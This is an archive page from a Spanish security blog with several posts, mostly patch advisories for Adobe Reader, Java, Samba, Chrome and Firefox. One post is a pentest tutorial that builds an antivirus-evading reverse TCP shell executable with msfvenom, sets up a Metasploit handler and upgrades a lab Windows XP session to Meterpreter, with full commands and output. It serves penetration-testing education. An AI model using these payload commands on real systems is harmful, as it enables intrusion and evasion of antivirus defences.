Mostrando entradas con la etiqueta Update. Mostrar todas las entradas
Mostrando entradas con la etiqueta Update. Mostrar todas las entradas

Revisando algunos antiguos post en #ST2 (www.seguridadparatodos.es) me he topado con la actualización de una herramienta que considero muy interesante para los profesionales que se dedican a la realización de test de penetración o hacking ético.

Se trata de converter, resulta que la primera vez que hable de ella se encontraba en la versión 0.8, y en este artículo os traigo las novedades de la versión 0.11.

Novedades

UNESCAPE File (incluido en el Menu File)

Esto nos permitirá extraer un texto plano (text) a fichero (file). De gran utilidad durante el análisis de algún Javascript y este esta utilizando JSBeautifier (only Javascript - sino no el código no fuera javascripts entonces no dara buen resultado).



Convertert Binary File
Se añade la capacidad de eliminar los bytes del fichero antes convertir el fichero a binario.


Sort Text 
Ahora en el menu de "Sort Text" se puede ordenar el texto por caracteres, filas o CSV.


Range Search/Replace
Tools Menu incluye la opción Range Search/Replace nos permite hacer una búsqueda y reemplazar usando uno de los tres métodos disponibles tal y como se puede observar en la siguiente captura de pantalla.


Un ejemplo a continuación de la nueva característica y sus métodos de búsqueda y reemplazo.


Key Search / Convert - Calculate Distance

Se ha incluido un método que trata de encontrar múltiples claves XOR. Si quieres conocer como funciona lee el siguiente artículo.

Importar un fichero sospechoso de ser un ejecutable en el programa, solo 1K es necesario, se hace click en "calculate distance" y automáticamente el programa utilizará los primeros Bits para evitar múltiples falsos positivos cuando se utiliza el tamaño completo. Es decir, cuando se tienen un texto muy corto o un offset demasiado grande.



Una gran herramienta indispensable para cualquier pentester o forencics, ya que permite trabajar con los ficheros para descubrir posibles "malware" o código dañino.

Descargar

Referencia:
http://www.kahusecurity.com/2014/converter-updated/
http://www.kahusecurity.com/tools/


















En el artículo de hoy, voy a realizar los pasos necesarios para convertir una simple shell en una sesión de meterpreter. Esto puede resultar muy util, sobretodo si durante el test de pentración te ves obligado a usar una shell simple por ser un archivo de reducidas dimensiones y tener cierta capacidad de evasión de IDS/IPS/AV.



#ST2Labs                                                                                                                                                                                                         

>> Paso 1:  Generación de una shell de reducidas dimensiones                                                                       

Tal y como ya vimos en su momento en mis otros artículos (I, II y III), se procederá a generar un ejecutable EXE con una shell reversa_tcp, utilizando técnicas de evasión de antivirus y reducción de tamaño.

root@ST2Labs:~# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00\x0d\x0a\x20' -f exe-small LHOST=192.168.2.105 LPORT=80 > /tmp/tcpviewshell.exe

Se obtiene:
tcpviewshell.exe (~ 5K) | En virustotal se obtiene un 17/45 (37%) de detección, donde algunos de los principales sistemas antivirus no lo detectan, ver informe utilizando el siguiente SHA256: 4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca

>> Paso 2:  Configurando Metasploit para gestionar la conexión inversa en el puerto 80                             

Para ello utilizaremos el comando msfconsole, tal como sigue a continuación:

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf  exploit(handler) > set LPORT 80
LPORT => 80
msf  exploit(handler) > set LHOST 192.168.2.105
LHOST => 192.168.2.105
msf  exploit(handler) > set EnableContextEncoding true

msf  exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.105:80 
[*] Starting the payload handler...


>> Paso 3:  Ejecutando el archivo tcpviewshell.exe en Windows XP SP3                                                   

Se obtiene el siguiente resultado:


>> Paso 4:  Convirtiendo una shell simple en una sesión de Meterpreter                                                     

Ahora, realizamos el upgrading de la shell win32 a meterpreter session | Lo que realmente se realiza es subir un archivo al equipo remoto utilizando el comando echo.

Para realizar el updating se ejecuta el comando session -u [Id_session_shell]


msf  exploit(handler) > sessions -u 1

[*] Started reverse handler on 192.168.2.105:80 
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.2.137
msf  exploit(handler) > sess[*] Meterpreter session 2 opened (192.168.2.105:80 -> 192.168.2.137:1107) at 2013-03-22 18:03:07 +0100
ions 


Finalmente se obtiene una segunda sesión remota con una interfaz meterpreter, véase la imagen siguiente:

Updating win32 shell to meterpreter.

ST2Labs
#Pentesting Rulez!


Adobe ha solucionado dos nuevas vulnerabilidades que afectan a sus programas Adobe Reader y Adobe Acrobat, tal y como ya os contábamos en nuestro anterior artículo, estas estaban siendo ampliamente utilizadas en Internet por los "cibercriminales".

El 20 de Febrero 2013 Adobe ha lanzado una actualización de emergencia, fuera del ciclo habitual de actualizaciones, para poner remedio a dichas vulnerabilidades.

Adobe nos recomienda las siguientes "actualizaciones" por orden de prioridad, verifica cuál es tu caso, y actúa en consecuencia.


PRIORITY AND SEVERITY RATINGS

Adobe categorizes these updates with the following priority ratings and recommends users update their installations to the newest versions:
ProductUpdated versionPlatformPriority rating
Adobe ReaderXI (11.0.02)Windows and Macintosh1
 X (10.1.6)Windows and Macintosh1
 9.5.4Windows and Macintosh1
 9.5.4Linux2
Adobe AcrobatXI (11.0.02)Windows and Macintosh1
 X (10.1.6)Windows and Macintosh1
 9.5.4Windows and Macintosh1

These updates address critical vulnerabilities in the software.

Actualizaciones

Adobe Reader users on Windows can also find the appropriate update here:
Adobe Reader users on Macintosh can also find the appropriate update here: Adobe Reader users on Linux can find the appropriate update here: ftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/


Vía: Adobe Security Bulletin


ULTIMA HORA (RELOAD):

Aunque parezca la "película" del día de la Marmota, no lo es y Oracle acaba de lanzar una actualización de urgencia (JAVA Update 11) para resolver la vulnerabilidad Zero-Day que esta sufriendo el plugin JAVA de los navegadores WEB.

Además este parche de seguridad incluye las siguientes mejoras:

  - Sube de "media" a "alta" la seguridad por defecto.
  - Sólo se ejecutaran los applets firmados y validados por CA (Certificado de autorización).



Descargar aquí:
     - [Windows OS] http://www.java.com/es/download/

Aplicar el parche lo antes posible, y rehabilitar el plugin en el navegador web si es que lo habíais deshabilitado.

Una vez instalado el archivo, reiniciáis el navegador WEB y comprobáis que la versión que tenéis instalada no es vulnerable entrando en la página web: http://www.isjavaexploitable.com/


Hace un tiempo que hablamos en el blog sobre Cryptocat y la extensión disponible para Google Chrome, si esta interesado puede releer el artículo haciendo click aquí.

Juliano Rizzo ha publicado la noticia en a través de su twitter, donde ha publicado una versión del código fuente que soluciona el problema. Por supuesto, Juliano Rizzo se ha puesto en contacto con el desarrollador del programa, quién esta trabajando junto a Juliano para solucionar el problemas, y hacer que la aplicación siga funcionando como un chat "cifrado" y "seguro".

De hecho, ya han sacado la actualización que soluciona los problemas de seguridad, por lo que si eres de los que utilizas con frecuencia esta aplicación  te recomiendo que actualices la aplicación al menos a la versión v2.0.22, aunque no hace mucho han anunciado una versión 2.0.23, que corrige pequeños problemas derivados de las ultimas modificaciones.

Lo más destacable, es que el equipo de cryptocat ha solucionado el problema rápidisimo, ahora solo queda hacer los deberes y actualizar rápidamente la aplicación.

Enhorabuena a todos los implicados  y Gracias! por la rapidez.

Descarga la versión actualizada aquí:

Código arreglado (FIX ) por Juliano Rizzo, aquí.

ULTIMA HORA: 

Oracle acaba de lanzar una actualización de urgencia (update7) para resolver la vulnerabilidad Zero-Day que esta sufriendo el plugin JAVA de los navegadores WEB.

Descargar aquí:

Aplicar el parche lo antes posible, y rehabilitar el plugin en el navegador web si es que lo habíais deshabilitado.

Una vez instalado el archivo (jre-7u7-windows-i586 (32bits) Windows), reiniciáis el navegador WEB y comprobáis que la versión que tenéis instalada no es vulnerable entrando en la página web: http://www.isjavaexploitable.com/


Así de fácil.
Un Saludo.
[POST] Para Administradores de Sistemas.

INTRODUCCIÓN

El día de ayer se dio a conocer una vulnerabilidad (CVE-2012-1182) crítica al estándar de Unix/Linux de interoperabilidad  con el Servicio de fichero compartidos en red de Windows: SAMBA.

Versiones comprometidas por la vulnerabilidad (CVE-2012-1182):
Samba 3.0.x to 3.6.3 are affected by a vulnerability that allows remote code execution as the "root" user. 
FUNCIONAMIENTO

Esta vulnerabilidad permitiría a un atacante ejecutar código remoto, por ejemplo una shell, desde una conexión totalmente anónima. Esto es especialmente crítica en entornos donde se comparte recursos, con acceso a Internet.

En particular, la vulnerabilidad ha sido detectada en un procedimiento de llamada remota (RPC), que no comprueba adecuadamente la longitud total de un "array".

SOLUCIÓN

Se recomienda aplicar el parche que se encuentra disponible en la siguiente dirección:


http://samba.org/samba/patches/
Samba administrators running affected versions are advised to upgrade to 3.6.4, 3.5.14, or 3.4.16 or apply these patches as soon as possible.
Un Saludo.


Fuente | Twitter de Sergio de los Santos | Samba - Security Announces
Ha pasado la borrasca, las nubes, los días de vacaciones y con la aparición del Sol llega el "calorcito" y las actualizaciones de Seguridad. 

En particular, hoy le ha tocado el turno a Chrome, el navegador Web de Google. Al parecer el plan de Google para convertir a su navegador en el más "seguro", mediante un sistema de recompensas, está recogiendo sus frutos en forma de actualizaciones. Y para esta ocasión la actualización (versión 18.0.1025.151m) corrige múltiples vulnerabilidades, al menos 12, de los cuales 7 son considerados "críticos" y 4 "medios".

Importancia: Alta
Se recomienda actualizar lo antes posible.

Aunque el navegador se encuentra configurado para que realice las actualizaciones de forma automática, se puede forzar la actualización desde el apartado de opción "Acerca de Google Chrome" en el menú de herramientas, y dejando que el propio navegador se actualice o seleccionando Actualizar.


Tras la actualización, deberéis de ver la versión 18.0.1025.151m:



Detalles técnicos de las Vulnerabilidades

  • [106577] Medium CVE-2011-3066: Out-of-bounds read in Skia clipping. Credit to miaubiz.
  • [117583] Medium CVE-2011-3067: Cross-origin iframe replacement. Credit to Sergey Glazunov.
  • [117698] High CVE-2011-3068: Use-after-free in run-in handling. Credit to miaubiz.
  • [117728] High CVE-2011-3069: Use-after-free in line box handling. Credit to miaubiz.
  • [118185] High CVE-2011-3070: Use-after-free in v8 bindings. Credit to Google Chrome Security Team (SkyLined).
  • [118273] High CVE-2011-3071: Use-after-free in HTMLMediaElement. Credit to pa_kt, reporting through HP TippingPoint ZDI (ZDI-CAN-1528).
  • [118467] Low CVE-2011-3072: Cross-origin violation parenting pop-up window. Credit to Sergey Glazunov.
  • [118593] High CVE-2011-3073: Use-after-free in SVG resource handling. Credit to Arthur Gerkis.
  • [119281] Medium CVE-2011-3074: Use-after-free in media handling. Credit to Sławomir Błażek.
  • [119525] High CVE-2011-3075: Use-after-free applying style command. Credit to miaubiz.
  • [120037] High CVE-2011-3076: Use-after-free in focus handling. Credit to miaubiz.
  • [120189] Medium CVE-2011-3077: Read-after-free in script bindings. Credit to Google Chrome Security Team (Inferno).


En una encuesta realizada a través del Blog "Genbeta" sobre el mejor antivirus del 2011, sale proclamado como ganador el Microsoft Security Essentials, en nuestro blog (www.seguridadparatodos.es) hicimos su correspondiente análisis donde podréis descubrir sus características, fortalezas y debilidades.


Si tienes Windows 7 os recomiendo que probéis este anitivirus! y si tenéis problemas de actualización en redes que operan con sistemas de conexión a Internet basado en Proxy de autenticación, os dejamos la solución en nuestro Blog, con el artículo !Actualización offline de Microsoft Security Essentials (MSE) ! en este artículo, se realiza una revisión sobre los problemas de actualización del Antivitus MSE cuando se utiliza un proxy y se proponen las soluciones correspondientes.

Un Saludo.
MSE (Microsoft Security Essentials) como ya sabréis es el antivirus gratuito de Microsoft, y como no puede ser de otra forma, en ocasiones se sacrifican opciones de configuración en "pro" de la facilidad del usuario. 

Cuál es mi sorpresa cuando me encuentro que el MSE ante un proxy "squid" con autenticación activada no es capaz de conectarse y actualizar la base de firmas.

La Investigación

Según foros de MSE Microsoft, el mecanismo de actualización del antivirus es el mismo que el utilizado por el Windows Update, de forma que si se puede llevar a cabo la actualización del Sistema Operativo debería de poder actualizarse el Antivirus.

Configuración de Conexión a Redes de Internet Explorer
Para actualizar el Sistema Operativo hay varios métodos, el más común y utilizado es a través la propia aplicación Windows Update, este toma la configuración para conectarse a Internet de navegador web Internet Explorer (véase la imagen superior), y en mi caso, se actualiza el sistema operativo correctamente, pero no el antivirus. 

Configuración de Proxy en el Sistema Operativo Windows 7

"Surfeando" por Internet y buscando información al respecto, para configurar el acceso mediante proxy en Windows Vista / Windows 7 / Windows 8 Server se utiliza el comando "netsh" tal y como se explica a continuación:


Configuración del Proxy en el Sistema: 
 
En un terminal de consola con permisos de Administrador se ejecutan 
los siguientes comandos:
 
Check the settings with (Comprobación de la configuración existente):

  netsh winhttp show proxy 
 
Configuración del Proxy:

  netsh winhttp set proxy {proxy address:port} {bypass list}
  netsh winhttp set proxy "proxy.bohack.com:8180" "<local>;*.bohack.com"
Borrar la configuración mediante proxy:
 netsh winhttp reset proxy
Netsh Proxy Settings Windows 7

Sin embargo, en una configuración de red con la utilización de archivos ".pac" para la configuración automática de servidores proxy con sistema de autenticación, la configuración del proxy mediante "netsh" no resulta ser muy efectiva.

Microsoft Security Essentials Proxy Errors.
¿Solución?

Por tanto he tenido que recurrir a buscar la solución de actualizar la base de datos de las firmas del antivirus de forma Offline.
 
La solución es la actualización manual del antivirus mediante la descarga de las firmas desde la página web de Microsoft:
En este foro se propone la creación de un sistema semiautomático que permita la descarga y difusión de las firma del antivirus. Para ello se propone descargar diariamente las firmas del antivirus MSE, utilizando el comando "wget" portado a windows (descargar aqui) mediante un bash script en un servidor "Maestro / Master" y mediante carpeta compartida en windows utilizar el comando MpCmdRun.exe perteneciente a MSE (Microsoft Security Essentials) para la instalación remota de las firmas.

Referencias

Mozilla Firefox es su "plan" para frenar el avance de Google Chrome (v16) e Internet Explorer 9, ambos calificados por un estudio encargado por Google [1][2] como los más seguros en la actualidad, acaba de lanzar la ultima versión de su Navegador Web.

En la ultima versión (9) del Mozilla Firefox, se incluyen como novedades:
  • Mejoras en el motor de renderizado y ejecución de "Javascript" con hasta un 30% de mejoras.
  • Mejoras en el soporte y estabilidad de Font-stretch, HTML5 y CSS.
  • Asimismo, se ha optimizado la integración el Mac OS X Lion, el sistema operativo de Apple, adaptándose al sistema de navegación táctil que ofrece la plataforma de la compañía de Cupertino.

Descargas

Todavía no aparecer en la página oficial de Mozilla (www.mozilla.es), no obstante, si que se encuentra disponible en la versión "US", a continuación el enlace para su descarga:
Fuente | ADSLZone
Hace unos días publicaba un "artículo" alertando sobre varias vulnerabilidades críticas (CVE-2011-2462, CVE-2011-4369) en productos de Adobe. Ayer Adobe hacia publico el lanzamiento de las versiones que solucionan dichas vulnerabilidades.

Versión de Adobe vulnerables

Las versiones de Adobe afectadas por la vulnerabilidades son:
  • Adobe Reader X (10.1.1) and earlier 10.x versions for Windows and Macintosh
  • Adobe Reader 9.4.6 and earlier 9.x versions for Windows, Macintosh and UNIX
  • Adobe Acrobat X (10.1.1) and earlier 10.x versions for Windows and Macintosh
  • Adobe Acrobat 9.4.6 and earlier 9.x versions for Windows and Macintosh
Sin embargo, Adobe anuncia que el parche solamente cubrirá a Adobe Reader 9.x en adelante, sin embargo, según la compañia para Adobe Reader X no lanzará el parche hasta los siguientes actualizaciones de seguridad. Asegurando la compañia que Adobe Reader X, aúnque vulnerable tiene unos mecanismos de protección que evitan que el exploit sea utilizado con éxito.

Actualizaciones para Windows
Version 9.4.7
Adobe Acrobat 9.4.7 Pro, Pro Extended, Standard update - All languages 4.5MB 12/16/2011
Version 9.4.6
Adobe Acrobat 9.4.6 Pro, Pro Extended, Standard update - All languages 52.5MB 9/13/2011

El resto puede consultar en http://get.adobe.com/es/reader/

Conclusión

En mi opinion, es un error pensar que los mecanismos de protección serán suficientes, deberían de haber publicado el parche, para evitar que cualquier modificación del exploit, consiga saltarse las "supuestas" medidas de protección en Adobe Reader X, por lo que en mi opinión seguimos con una vulnerabilidad zero-day en Adobe Reader X 10.1.1 ¿Para cuando la solución? Los de Adobe, solo dicen en la próxima actualización ¿Cuando? No se sabe. Seguiremos atentos para informaros a todos.

Un Saludo.

Fuente | Adobe Security
Google Chrome ha liberado la versión 15 de su Navegador Web con una actualización de Seguridad (versión 15.0.874.120) que corrige mútiples vulnerabilidades.

Esta versión incluye la ultima actualización de Adobe Flash Player, que a su vez corrige las ultimas vulnerabilidades detectadas en el reproductor flash de adobe.

Importancia: Alta
Se recomienda actualizar lo antes posible.

La actualización corrige 7 vulnerabilidades, de las cuales 5 son consideradas peligrosas (altas) o muy peligrosas.

Aunque el navegador se encuentra configurado para que realice las actualizaciones de forma automática, se puede forzar la actualización desde el apartado de opción "Acerca de Google Chrome" en el menú de herramientas, y dejando que el propio navegador se actualice o seleccionando Actualizar.  


El resultado es:

Detalles técnicos de las Vulnerabilidades
  • [100465] High CVE-2011-3892: Double free in Theora decoder. Credit to Aki Helin of OUSPG.
  • [100492] [100543] Medium CVE-2011-3893: Out of bounds reads in MKV and Vorbis media handlers. Credit to Aki Helin of OUSPG.
  • [101172] High CVE-2011-3894: Memory corruption regression in VP8 decoding. Credit to Andrew Scherkus of the Chromium development community.
  • [101458] High CVE-2011-3895: Heap overflow in Vorbis decoder. Credit to Aki Helin of OUSPG.
  • [101624] High CVE-2011-3896: Buffer overflow in shader variable mapping. Credit to Ken “strcpy” Russell of the Chromium development community.
  • [102242] High CVE-2011-3897: Use-after-free in editing. Credit to pa_kt reported through ZDI (ZDI-CAN-1416).
  • [102461] Low CVE-2011-3898: Failure to ask for permission to run applets in JRE7. Credit to Google Chrome Security Team (Chris Evans).
The bugs [100465], [100492], [100543] and [101458] were detected using AddressSanitizer.

Fuente Google Chrome Releases